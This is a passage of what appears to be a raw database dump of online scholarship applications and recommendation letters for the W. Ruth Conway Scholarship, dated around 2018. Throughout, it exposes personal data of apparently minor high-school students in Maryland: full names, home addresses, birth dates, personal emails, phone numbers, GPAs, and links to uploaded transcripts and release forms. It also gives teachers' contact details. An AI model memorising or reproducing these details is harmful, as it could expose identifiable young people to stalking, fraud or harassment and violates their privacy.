recommended'),(2018,206,8,1.3,'Sherri'),(2019,206,8,1.6,'Malloy'),(2020,206,8,11,'Wilde Lake High School'),(2021,206,8,12,'School Counselog'),(2022,206,8,2,'sherri_malloy@hcpss.org'),(2023,206,8,3,'Sydney Lingham'),(2024,206,8,4,'3 years'),(2025,206,8,5,'Advisor/Counselor'),(2026,206,8,7,'Excellent'),(2027,206,8,9,'Excellent'),(2028,206,8,8,'Excellent'),(2029,206,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/LinghamSydneyMalloy.docx'),(2030,206,8,16,'Highly recommended'),(2031,207,6,18.3,'Asha'),(2032,207,6,18.6,'Washington'),(2033,207,6,19.1,'6114 Noah Way'),(2034,207,6,19.3,'Hanover'),(2035,207,6,19.4,'MD'),(2036,207,6,19.5,'21076'),(2037,207,6,19.6,'United States'),(2038,207,6,4,'10-10-2000'),(2039,207,6,21,'asha2018@hotmail.com'),(2040,207,6,20,'(443) 956-3088'),(2041,207,6,10,'Atholton High School'),(2042,207,6,27,'BSAP Advisor'),(2043,207,6,28,'N/A'),(2044,207,6,9,'3.14'),(2046,207,6,26,'International Relations'),(2047,207,6,12,'NA'),(2048,207,6,14,'Sister-to-Sister mentorship program - 2015 to present\r\nARMY Junior ROTC program - 2014 to present'),(2049,207,6,13,'Council of Elders Honor\r\n\r\nHonor Roll Athlete\r\nHonor Roll AHS\r\nJROTC Honor Athlete\r\nJROTC Honor Student'),(2050,207,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Unofficial-Transcript.pdf'),(2051,207,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Release-form-page-2.pdf'),(2052,207,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/W-Ruth-Conway-scholarship.docx'),(2053,208,6,18.3,'Asha'),(2054,208,6,18.6,'Washington'),(2055,208,6,19.1,'6114 Noah Way'),(2056,208,6,19.3,'Hanover'),(2057,208,6,19.4,'MD'),(2058,208,6,19.5,'21076'),(2059,208,6,19.6,'United States'),(2060,208,6,4,'10-10-2000'),(2061,208,6,21,'asha2018@hotmail.com'),(2062,208,6,20,'(443) 956-3088'),(2063,208,6,10,'Atholton High School'),(2064,208,6,27,'BSAP Advisor'),(2065,208,6,28,'N/A'),(2066,208,6,9,'3.14'),(2068,208,6,26,'International Relations'),(2069,208,6,12,'NA'),(2070,208,6,14,'Sister-to-Sister mentorship program - 2015 to present\r\nARMY Junior ROTC program - 2014 to present'),(2071,208,6,13,'Council of Elders Honor\r\n\r\nHonor Roll Athlete\r\nHonor Roll AHS\r\nJROTC Honor Athlete\r\nJROTC Honor Student'),(2072,209,6,18.3,'Ijeoma'),(2073,209,6,18.6,'Okoro'),(2074,209,6,19.1,'7175 Moorland Drive'),(2075,209,6,19.3,'Clarksville'),(2076,209,6,19.4,'MD'),(2077,209,6,19.5,'21029'),(2078,209,6,19.6,'United States'),(2079,209,6,4,'07/16/00'),(2080,209,6,21,'iokoro00@gmail.com'),(2081,209,6,20,'(240) 778-9040'),(2082,209,6,10,'Atholton High School'),(2083,209,6,27,'BSAP Advisor'),(2084,209,6,28,'na'),(2085,209,6,9,'3.3'),(2087,209,6,26,'Accounting'),(2088,209,6,12,'NA'),(2089,209,6,14,'BSU Treasurer - 1Year\r\nAtholton JROTC S1 Adjudant assistant - 1 Year\r\nAtholton JROTC Platoon Leader - 1 year\r\nAtholton JROTC Squad Leader- 2 Years'),(2090,209,6,13,'Gold Honor Roll- Consecutively since Freshman Year\r\nRegional Ranked Sprinter- 2017\r\nNationally Ranked Unarmed Drill team-  2014/2016/2018\r\nNationally Ranked Junior Leadership Academic Bowl-2017/2018\r\nNational Spanish Exam Participant\r\nStudent of the month- February 2015, March 2016'),(2091,209,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/If-you-had-access-to-unlimited-resources.docx'),(2092,209,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Doc1.pdf'),(2093,209,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Doc2.pdf'),(2094,210,6,18.3,'Samantha'),(2095,210,6,18.6,'Hall'),(2096,210,6,19.1,'6904 Sandy Creek Ct'),(2097,210,6,19.3,'Clarksville'),(2098,210,6,19.4,'Maryland'),(2099,210,6,19.5,'21029'),(2100,210,6,19.6,'United States'),(2101,210,6,4,'05-21-00'),(2102,210,6,21,'samanthalindseyy@gmail.com'),(2103,210,6,20,'(410) 402-3897'),(2104,210,6,10,'Atholton High School'),(2105,210,6,27,'BSAP Advisor'),(2106,210,6,28,'N/A'),(2107,210,6,9,'3.45'),(2109,210,6,26,'Political Science'),(2110,210,6,12,'NA'),(2111,210,6,14,'- President of Sister 2 Sister, 4 years \r\n- Black Student Union, 3 years \r\n- Track and Field, 3  years'),(2112,210,6,13,'- STAR Scholarship Recipient 2017 \r\n- Atholton\'s Rho Kappa Social Studies Honor Society, 2016-17 and 2017-18 \r\n- National Honor Society, Treasurer, 2017-18\r\n- National Society of High School Scholars, 2016, 2017, 2018'),(2113,210,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Ruth-Conway-Scholarship-Essay.pdf'),(2114,210,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Scan-Mar-30-2018-at-9_19-PM.pdf'),(2115,210,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Scan-Mar-30-2018-at-10_36-PM.pdf'),(2116,211,8,1.3,'Sheila'),(2117,211,8,1.6,'Carr-Spence'),(2118,211,8,11,'Atholton High School'),(2119,211,8,12,'Mathematics Teacher'),(2120,211,8,2,'sheila_carr-spence@hcpss.org'),(2121,211,8,3,'Samantha Hall'),(2122,211,8,4,'four years'),(2123,211,8,5,'Other'),(2124,211,8,6,'I\'ve been Samantha\'s mentor and club advisor for four years.'),(2125,211,8,7,'Excellent'),(2126,211,8,9,'Excellent'),(2127,211,8,8,'Excellent'),(2128,211,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Recommendation-for-Samantha-Hall.docx'),(2129,211,8,16,'Highly recommended'),(2130,212,6,18.3,'Adjoa'),(2131,212,6,18.6,'Armoo'),(2132,212,6,19.1,'10572 Twin Rivers Rd Apt F1'),(2133,212,6,19.3,'Columbia'),(2134,212,6,19.4,'Maryland'),(2135,212,6,19.5,'21044'),(2136,212,6,19.6,'United States'),(2137,212,6,4,'11-22-99'),(2138,212,6,21,'adjoa.armoo@hotmail.com'),(2139,212,6,20,'(410) 314-6071'),(2140,212,6,10,'Atholton High School'),(2141,212,6,27,'Other'),(2142,212,6,28,'During the Becca\'s Closet event I was told about the scholarship'),(2143,212,6,9,'3.7'),(2145,212,6,26,'Biology, Chemistry, or Biochemistry'),(2146,212,6,12,'7'),(2147,212,6,14,'Delta Scholars - 3 years\r\nJROTC Unarmed Drill Team- 4 years - Commander\r\nNational Honors Society -'),(2148,212,6,13,'French Honors Society- 2015\r\nDelta Scholars Honor Society- 2015\r\nNational Honors Society- 2016'),(2149,212,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Zeta-Phi-Beta-College-Degree-Impact-Future.docx'),(2150,212,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Transcript2.pdf'),(2151,212,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/ZPB-Media-Release.pdf'),(2152,213,6,18.3,'Summer'),(2153,213,6,18.6,'Williams'),(2154,213,6,19.1,'9447 Sohap Lane'),(2155,213,6,19.3,'Columbia'),(2156,213,6,19.4,'Maryland'),(2157,213,6,19.5,'21045'),(2158,213,6,19.6,'United States'),(2159,213,6,4,'08-04-2000'),(2160,213,6,21,'sumaewill@hotmail.com'),(2161,213,6,20,'(443) 996-0047'),(2162,213,6,10,'Atholton High School'),(2163,213,6,27,'Friend/Family Member'),(2164,213,6,28,'N/A'),(2165,213,6,9,'3.67'),(2167,213,6,26,'Chemical Engineering'),(2168,213,6,12,'NA'),(2169,213,6,14,'Band/Marching Band, (2014-2018), Assistant Drum Major (2017), Trumpet Section Leader (2015-2017)					\r\nDelta Scholars, (2015-2018), Event Coordinator (2016-2018) \r\nBlack Student Union, (2016-2018), 	Chairperson(2017-2018)\r\nNational Honors Society, (2016-2018)'),(2170,213,6,13,'Gold Honor Roll\r\nAcceptance into National Honors Society\r\nAcceptance into Delta Scholars'),(2171,213,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/W.-Ruth-Conway-Scholarship-Essay-Summer-Williams.pdf'),(2172,213,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Unofficial-Transcript1.pdf'),(2173,213,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Photo-Release-Form2.pdf'),(2174,214,6,18.3,'Kianna'),(2175,214,6,18.6,'Ameni-Melvin'),(2176,214,6,19.1,'10467 Owen Brown rd.'),(2177,214,6,19.3,'Columbia'),(2178,214,6,19.4,'Maryland'),(2179,214,6,19.5,'21044'),(2180,214,6,19.6,'United States'),(2181,214,6,4,'03-06-00'),(2182,214,6,21,'kmelvinwork@gmail.com'),(2183,214,6,20,'(240) 708-3021'),(2184,214,6,10,'Atholton High School'),(2185,214,6,27,'BSAP Advisor'),(2186,214,6,28,'n/a'),(2187,214,6,9,'3.0'),(2189,214,6,26,'Special Education'),(2190,214,6,12,'NA'),(2191,214,6,14,'Best Buddies- 2014-2018\r\nClub Officer- help facilitate activities for the peer and associate buddies to bond \r\nSecretary- help match buddy pairs\r\nDelta Scholars- 2015-2018\r\nCo-chair - Organize the attendance and fundraisers\r\nSGA (Student Government Association)- 2014-2018\r\nmember \r\nBSU(Black Student Union)- 2015-2018\r\nBSU Secretary\r\nFBLA (Future Business Leaders of America)- 2015-2016\r\nmember\r\nSkills USA- 2016-2017\r\ncompetitor\r\nVolleyball Team- 2014\r\nCo-captain'),(2192,214,6,13,'Student of the month (2015)\r\nHonor roll (2014-present)\r\nService award- youth missionary (2017)\r\nVolunteer award- Special Olympics(2014- present)\r\n7th place- FBLA states (2016)'),(2193,214,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/LGZ-essay.pdf'),(2194,214,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/transcript.docx'),(2195,214,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/LGZScholarshipReleaseForm1.pdf'),(2196,215,6,18.3,'Catherine'),(2197,215,6,18.6,'Volcy'),(2198,215,6,19.1,'10865 Braeburn Road'),(2199,215,6,19.3,'Columbia'),(2200,215,6,19.4,'Maryland'),(2201,215,6,19.5,'21044'),(2202,215,6,19.6,'United States'),(2203,215,6,4,'08-14-00'),(2204,215,6,21,'catherine_volcy@hotmail.com'),(2205,215,6,20,'(667) 200-6568'),(2206,215,6,10,'Atholton High School'),(2207,215,6,27,'Friend/Family Member'),(2208,215,6,28,'N/A'),(2209,215,6,9,'3.62'),(2211,215,6,26,'Biology'),(2212,215,6,12,'NA'),(2213,215,6,14,'Debate  Club - 1 Year  - Varsity Letter\r\nAvid - 1 year - Work Area Leader\r\nCareer Practicum -  1 year - Member \r\nNational Honors Society - 2016 - Member\r\nNational Society of High School Scholars - 2015 - Member\r\nModel United Nations - 2015 - Member'),(2214,215,6,13,'Black History Month 2nd Place Essay - 2017\r\nMLK 2nd Place Essay - 2018\r\nAcademic Letter - 2017\r\nHonor Roll -2015\r\nHigh Honor Roll - 2016\r\nPrincipal’s Honor Roll - 2016, 2017,  2018\r\nCertificate of Membership into the National Honors Society - 2016 \r\nMerit Student - 2018\r\nAcademic Award for African American Students - 2018'),(2215,215,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/WOMEN-SCHOLARSHIP.docx'),(2216,215,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/unoffical-transcript.pdf'),(2217,215,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/LGZScholarshipReleaseFormEdit.pdf'),(2218,216,8,1.3,'Matthew'),(2219,216,8,1.6,'Pickett'),(2220,216,8,11,'Wilde Lake High School'),(2221,216,8,12,'Visual Arts Teacher'),(2222,216,8,2,'matthew_pickett@hcpss.org'),(2223,216,8,3,'Dashae\' Coley Epps'),(2224,216,8,4,'1 year'),(2225,216,8,5,'Teacher/Professor'),(2226,216,8,7,'Excellent'),(2227,216,8,9,'Excellent'),(2228,216,8,8,'Excellent'),(2229,216,8,14,'see attached'),(2230,216,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/03/Dashae-Coley-Epps-Recommendation.docx'),(2231,216,8,16,'Highly recommended'),(2232,217,8,1.3,'Raemond'),(2233,217,8,1.6,'Parrott'),(2234,217,8,11,'Howard County Office of Human Rights'),(2235,217,8,12,'Community Relations Representative'),(2236,217,8,2,'parrottllc@gmail.com'),(2237,217,8,3,'Ellis Finney-Wright'),(2238,217,8,4,'3 years'),(2239,217,8,5,'Advisor/Counselor'),(2240,217,8,6,'Church mentor'),(2241,217,8,7,'Excellent'),(2242,217,8,9,'Excellent'),(2243,217,8,8,'Excellent'),(2244,217,8,14,'I have served as a mentor for Ellis Finney-Wright for the past three years, as part of the mentoring program at St. Johns Baptist Church of Columbia, Maryland. Throughout the past three years, Ellis has grown by leaps and bounds in terms of his faith, maturation, scholarship, and service to his community. High school is a critical crossroads in the lives of young Black men, and it often at this juncture where many of them succumb to the perils of their environments as well as the often-disparate treatment they receive in the classroom. The expectations placed upon them are less than their white counterparts, and in conjunction with those lowered expectations they receive less academic support. Rather than fall victim to these ails, I have witnessed Ellis rise above them and pull other young Black males up with him.\r\nThrough his scholarship, leadership, and service he has become a become of inspiration to others in the mentoring program who are experiencing difficulties both at home and in school. Ellis is a highly intelligent and motivated individual, who balances a part-time job, his musical endeavors, and supporting his parents in caring for his toddler-age sister, with his responsibilities in school, church, and the community. He has regularly given up his weekends for the past three years to participate in providing aid to the impoverished, companionship to seniors, and\r\nleadership to other young men. It is for these reasons that I am honored to recommend Ellis Finney-Wright for the W. Ruth Conway Scholarship.'),(2245,217,8,16,'Highly recommended'),(2246,218,6,18.3,'Nina'),(2247,218,6,18.6,'Bundy'),(2248,218,6,19.1,'5058 Executive Park Drive'),(2249,218,6,19.3,'Ellicott City'),(2250,218,6,19.4,'Maryland'),(2251,218,6,19.5,'21043'),(2252,218,6,19.6,'United States'),(2253,218,6,4,'08-24-00'),(2254,218,6,21,'ninabundy@comcast.net'),(2255,218,6,20,'(410) 491-9426'),(2256,218,6,10,'Howard High School'),(2257,218,6,27,'Other'),(2258,218,6,28,'Naviance'),(2259,218,6,9,'3.52'),(2261,218,6,26,'Political Science'),(2262,218,6,12,'NA'),(2263,218,6,14,'Student Government Association – Howard High School,	 4 years	\r\n•	Executive President of the Board, Senior Year\r\n•	President, Class of 2018, Junior Year\r\n•	Student Representative, Class of 2018, Sophomore Year\r\n•	Vice President, Class of 2018, Freshman Year\r\n\r\nHoward High Mock Trial Team,	4 years,	Member\r\n\r\nHoward High Step Team,	3 years,	Member and Co-Captain (2014-2016)\r\n\r\nHoward High Black Student Union Club (BSU), 2 years, Treasurer (2016-2017)\r\n\r\nHoward High Indoor and Outdoor Track Team, 4 years outdoor, 3 indoor, Varsity Sprinter\r\n\r\nNational Honor Society, 3 years,	Participant\r\n\r\nSpanish Honor Society, 3 years,	Participant\r\n\r\nOkinawan Shorin-Ryu Karate, 13 years, Student, Black Belt Instructor\r\n\r\nHoward County Leadership University, 2 years, Participant, Advocate, Steering Committee Student Member\r\n\r\nElkridge Horizon Council / Horizon Foundation, 4 years,	Student Leader / Community service organizer\r\n\r\nHoward County Recreation and Parks, 1 year,	Junior Camp Counselor\r\n\r\n40th Annual Debutante Cotillion, Columbia Alumnae Chapter, Delta Sigma Theta Sorority, 1 year,	Debutante\r\n\r\nAnnual Youth County Summit (Voices 4 Change), 2 years, 	Student Representative\r\n\r\nNational Youth Leadership Forum, weeklong residential program-sponsored by Envision/George Mason University, 1 summer,	Participant\r\n\r\nProfessional conference at the JHU Applied Physics Laboratory Kossiakoff Center to understand the role of research	Summer	Participant, 1 summer\r\n\r\nAnnual Youth County Summit (Voices 4 Change)	2 summers,	Student Representative'),(2264,218,6,13,'2016-Present 	National Honor Society \r\n\r\n2016-Present	Spanish Honor Society\r\n\r\n2017/2018    \r\n\r\n  Grassroots Volunteer – picture to immediate right of sign ‘GrassRoots Need Your Help’: http://www.baltimoresun.com/news/maryland/howard/columbia/ph-ho-cf-syb17-1123-story.html\r\n\r\nPowerpoint presented before Howard County Board of Education – fast forward to 23:45 minute mark: http://hcpsstv.new.swagit.com/videos/5426\r\n\r\n\r\n2015-2017	Varsity Sprinter - Scholar Athlete, Indoor and Outdoor Track & Field:\r\n	Scholar Athlete Awards for achieving better than a 3.25 GPA while participating in Interscholastic Athletics \r\n	Rookie of Year Trophy and award for indoor and outdoor track \r\n	Placed 9th   in the top 10 of Howard High’s recorded history for Girls Indoor Track, for the 55M\r\n	Placed 3rd in the top 10 of Howard High’s recoded history for Girls Outdoor Track for the 4x200\r\n\r\n2017	    	Debutante, 40th Annual Debutante Cotillion sponsored by the Columbia\r\n (MD) Alumnae Chapter, Delta Sigma Theta Sorority, Inc.  Earned the following\r\n academic and civic achievement awards: \r\n	A Citation from United States Senator, Chris Van Hollen \r\n	Certificate of Special Recognition from the Honorable C.A. Dutch Ruppersberger, 2nd Congressional District in Maryland\r\n	Certificate of Recognition from Allan H. Kittleman, Howard County Executive\r\n	A plaque, certificate, and an award from the Columbia (MD) Alumnae Chapter of Delta Sigma Theta Sorority, Inc. \r\n\r\n2017	 	Participant, Professional conference at the JHU Applied Physics Laboratory \r\n	Kossiakoff Center to understand the role of research\r\n\r\n2017		Participant, American Legion Auxiliary Maryland Girls State Citizenship\r\n                    Residential Training Program\r\n\r\n2014, 2016         Student Representative, Annual Youth County Summit (Voices 4 Change)\r\n\r\n2015		Starred in the Howard Lions Video presented to all incoming freshman\r\n\r\n2014 		Student of the Month, Received the “Golden 9” trophy and award for excellence'),(2265,218,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/RuthConwayScholarship_NinaBundy_Essay.pdf'),(2266,218,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/NinaBundy_HowardHighTranscript_2018.pdf'),(2267,218,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/LGZ-ScholarshipReleaseForm_Signed2.pdf'),(2268,219,6,18.3,'Alexandra'),(2269,219,6,18.6,'Alston'),(2270,219,6,19.1,'6142 Majors Lane'),(2271,219,6,19.3,'Columbia'),(2272,219,6,19.4,'MD'),(2273,219,6,19.5,'21045'),(2274,219,6,19.6,'United States'),(2275,219,6,4,'10/18/00'),(2276,219,6,21,'alexalston18@gmail.com'),(2277,219,6,20,'(410) 599-0218'),(2278,219,6,10,'Reservoir High School'),(2279,219,6,27,'BSAP Advisor'),(2280,219,6,28,'BSAP advisor'),(2281,219,6,9,'3.52'),(2283,219,6,26,'Engineering/STEM'),(2284,219,6,12,'3-in English;  Dual Enrollment with Howard Community College'),(2285,219,6,14,'Tri-M National Music Honor Society, 3 years, Co-Vice President School Year (SY)  17-18, Secretary SY 16-17\r\nReservoir High School (RHS) Orchestra, 4 years, Second Violin Section Leader SY 17-18, 16-17, 15-16\r\nNational Honor Society, 3 years, member, 2016 -Present\r\nNational Spanish Honor Society, 3 years, member, 2016 - Present\r\nRHS Women\'s Choir, 3 years, member\r\nRHS Concert Choir, 4 years, member\r\nHOBY Maryland Leadership Conference, 1 year, Delegate 2016'),(2286,219,6,13,'Wellesley College Book Award, Spring 2017\r\nRHS Music Foundation President\'s Award, Spring 2017\r\nRHS Departmental Math Award, Spring 2016\r\nRHS Orchestra Director\'s Award, Spring 2016\r\nRHS Orchestra Rookie of the Year Award, Spring 2015'),(2287,219,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Alexandra-Alston-Ruth-Conway-Scholarship.docx'),(2288,219,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/Alex-Transcript-jan-18.pdf'),(2289,219,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/scan0001.pdf'),(2290,220,6,18.3,'Mary'),(2291,220,6,18.6,'Asubonten'),(2292,220,6,19.1,'5247 Harvey Lane'),(2293,220,6,19.3,'Ellicott City'),(2294,220,6,19.4,'Maryland'),(2295,220,6,19.5,'21043'),(2296,220,6,19.6,'United States'),(2297,220,6,4,'03-15-00'),(2298,220,6,21,'maryasubonten@gmail.com'),(2299,220,6,20,'(443) 844-1259'),(2300,220,6,10,'Howard High School'),(2301,220,6,27,'Friend/Family Member'),(2302,220,6,28,'NA'),(2303,220,6,9,'3.2'),(2305,220,6,26,'Communications'),(2306,220,6,12,'NA'),(2307,220,6,14,'National Honor Society- 2017, member\r\nDelta Scholars- 2017, member\r\nGlobal Education Club- 2014-2018, treasurer\r\nThe Franciscan Center- 2015-2018, volunteer\r\nOur Lady of Perpetual Help- 2015, volunteer\r\nTrack and Field- 2015-2018, team member\r\nCheerleading- 2015-2018, team member\r\nField Hockey- 2015-2016, team member\r\nPanera Bread Co.- 6/2017-present, employee\r\nGirl Up- 2015-2018, member'),(2308,220,6,13,'Scholar Athletes Minds in Motion Award 2014-2018\r\nHonor Roll 2014-2017\r\nAcademic Letter 2016\r\nTCOE Certificate of Achievement 2018'),(2309,220,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/scan0011.pdf'),(2310,220,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/scan0017.pdf'),(2311,220,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/MA_Ruth-Conway-Scholarship-Essay.docx'),(2312,221,6,18.3,'Jenaye'),(2313,221,6,18.6,'Brook-Rivers'),(2314,221,6,19.1,'8939 good harvest court'),(2315,221,6,19.3,'Jessup'),(2316,221,6,19.4,'Maryland'),(2317,221,6,19.5,'20794'),(2318,221,6,19.6,'United States'),(2319,221,6,4,'02-14-00'),(2320,221,6,21,'jenaye.brooksrivers@gmail.com'),(2321,221,6,20,'(301) 852-4073'),(2322,221,6,10,'Hammond High School'),(2323,221,6,27,'Friend/Family Member'),(2324,221,6,28,'NA'),(2325,221,6,9,'3.0'),(2327,221,6,26,'Fashion Merchandise'),(2328,221,6,12,'NA'),(2329,221,6,14,'WORK EXPERIENCE\r\n2017-Present        Express at the Columbia mall\r\n            Retail Associate\r\nOffering assistance when needed, ensuring product is on the floor and sized appropriately, and all customers have a quick and efficient cash wrap experience. Additional tasks include styling, cleaning, and folding merchandise.\r\n2017- Present     Internship at Marilyn Johnson Design Studio \r\nIntern/ Mentor program teaching me the skills to become a fashion designer.\r\n2016 –Present     Supreme Sports Club\r\n            Front Desk/Kids Space Attendant\r\nSupervise kids ages 3 weeks to 13 years of age, while parents utilize club facilities\r\nLead and organize themed Birthday parties, serving guest and birthday child.\r\nManage front desk operations, answering calls, check in and register club members and handle monetary transactions.\r\n2015- Present        House Cleaning Services \r\nProvide cleaning services to the homes of friends and family members needing assistance with deep cleaning and other general household chores\r\n 2013- Present              Child Care Services\r\n Provide child care for several families needing additional child care during school breaks, holidays on a per-diem basis  \r\n\r\nACTIVITIES (clubs, sports, organizations)\r\n\r\n2018-Present        North Laurel Community Center Fashion Show\r\n            Modeling Coach/Youth Mentor\r\n\r\n2018-Present        Celebration church of Columbia \r\nYouth Praise and Worship Leader (W.I.N)\r\n\r\n2017                           Savage Mill Fashion Show Model\r\n\r\n2017-2018        Hammond High School musicals\r\n            Costume director\r\n2016-2017               Fox 5 News - Good Morning DC\r\nParticipated in fashion news segments as a model for H&M & Boohoo.com Fashions\r\n\r\n2016 - Present             FBLA (Future Business Leaders of America)\r\nSocial Media Manager/ Accountability Manager\r\nManage and monitor social media posts of committee members. Ensure assigned tasks are complete, accurate and up to date on various social media platforms\r\n\r\n2015-Present              Fashion Club - Hammond HS\r\n                                    President\r\nEstablished Hammond HS first fashion club through the sponsorship of FIDM (Fashion Institute of Design and Merchandise) Create, design and organize all components needed to develop and produce the Annual HS Fashion Show.\r\n\r\n2014-Present               Best Buddies Program Hammond HS\r\n                                     Vice President 2015 & Member since 2014 \r\nDevelop, encourage and organize activities for students with developmental challenges. Maintain relationships that expand inside and outside of the school activities\r\n\r\n2014- Present              Girls On The Run\r\n                                    Volunteer Coach (Winter/Spring)\r\nProvide mentor support with elementary and middle school aged kids while preparing for the annual 5k race\r\n\r\n 2014- Present              Delta GEMS - Academy Member\r\nParticipant in the Mentor/Mentee program established for HS teens to build their character in achieving high academic success, social awareness and self confidence\r\n\r\n 2015                            Rose Walk Company - Intern Stylist/Assistant\r\nStyled models and and gave artistic input to the overall design and concepts for a variety of photoshoot campaigns\r\n\r\n 2015                            IMG (Interface Media Group) Internship - Photographer Assistant \r\nAssisted director of IMG behind the scenes with styling, running errands and providing other assistance as needed while on set'),(2330,221,6,13,'2017                    Student of the Month (February)\r\n2014-2016           Gold Honor Roll Award'),(2331,221,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/essay-for-scholar.pdf'),(2332,221,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/transcript.pdf'),(2333,221,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/03/release-form.pdf'),(2334,222,8,1.3,'Devin'),(2335,222,8,1.6,'White'),(2336,222,8,11,'Atholton High School'),(2337,222,8,12,'Teacher'),(2338,222,8,2,'devin_white@hcpss.org'),(2339,222,8,3,'Samantha Hall'),(2340,222,8,4,'2 years'),(2341,222,8,5,'Teacher/Professor'),(2342,222,8,7,'Excellent'),(2343,222,8,9,'Excellent'),(2344,222,8,8,'Excellent'),(2345,222,8,14,'I have had the pleasure of working with Samantha over the course of the past two years as a student of mine (World History Honors) and as my dependable student aide.  Ms. Hall excelled throughout the year in my class and exhibited the highest quality of work as well as assisting other classmates to further ensure their comprehension of historical trends and themes. Following many class periods Samantha would stay after and discuss material being covered in class as well as current events around the globe. Ms. Hall works extremely well independently and in group settings as well. During her senior year Samantha has been my student aide and I rely on her to assist me in day-to-day tasks to ensure clerical work is being completed on time in my class. I highly recommend Ms. Samantha Hall with no reservations for the prestigious W. Ruth Conway Scholarship. I apologize for the tardiness of my submission. That is strictly my fault and not Ms. Hall\'s. Thank you in advance for your consideration.'),(2346,222,8,16,'Highly recommended'),(2347,223,8,1.3,'Donna'),(2348,223,8,1.6,'Schwab'),(2349,223,8,11,'Atholton High School'),(2350,223,8,12,'tracher'),(2351,223,8,2,'donna_schwab@hcpss.org'),(2352,223,8,3,'Adjoa Armoo'),(2353,223,8,4,'4 years as student and adviser'),(2354,223,8,5,'Teacher/Professor'),(2355,223,8,7,'Excellent'),(2356,223,8,9,'Excellent'),(2357,223,8,8,'Excellent'),(2358,223,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/04/adjoaarmoo2017.docx'),(2359,223,8,16,'Highly recommended'),(2360,224,8,1.3,'Amy'),(2361,224,8,1.6,'Connor'),(2362,224,8,11,'Oakland Mills High School'),(2363,224,8,12,'Science Instructional Team Leader'),(2364,224,8,2,'amy_connor@hcpss.org'),(2365,224,8,3,'Seun Showunmi'),(2366,224,8,4,'2 years'),(2367,224,8,5,'Teacher/Professor'),(2368,224,8,7,'Excellent'),(2369,224,8,9,'Excellent'),(2370,224,8,8,'Excellent'),(2371,224,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/04/Seun-Showunmi-2017.pdf'),(2372,224,8,16,'Highly recommended'),(2373,225,8,1.3,'William'),(2374,225,8,1.6,'Reinhart'),(2375,225,8,11,'Atholton High School'),(2376,225,8,12,'JROTC Senior Army Instructor'),(2377,225,8,2,'william_reinhart@hcpss.org'),(2378,225,8,3,'Ijeoma 